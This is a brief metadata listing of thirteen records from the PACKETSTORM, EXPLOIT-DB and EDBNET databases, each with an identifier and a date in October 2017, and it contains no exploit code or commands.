db: | PACKETSTORM | id: | 144468 | date: | 2017-10-02T05:22:22 |
db: | PACKETSTORM | id: | 144473 | date: | 2017-10-02T10:01:11 |
db: | PACKETSTORM | id: | 144462 | date: | 2017-10-02T03:33:33 |
db: | PACKETSTORM | id: | 144471 | date: | 2017-10-02T08:32:22 |
db: | PACKETSTORM | id: | 144480 | date: | 2017-10-02T16:22:22 |
db: | PACKETSTORM | id: | 144479 | date: | 2017-10-02T14:44:44 |
db: | EXPLOIT-DB | id: | 42944 | date: | 2017-10-02T00:00:00 |
db: | EDBNET | id: | 94654 | date: | 2017-10-13T00:00:00 |
db: | EDBNET | id: | 94657 | date: | 2017-10-13T00:00:00 |
db: | EDBNET | id: | 94656 | date: | 2017-10-13T00:00:00 |
db: | EDBNET | id: | 94398 | date: | 2017-10-02T00:00:00 |
db: | EDBNET | id: | 94655 | date: | 2017-10-13T00:00:00 |
db: | EDBNET | id: | 94653 | date: | 2017-10-13T00:00:00 |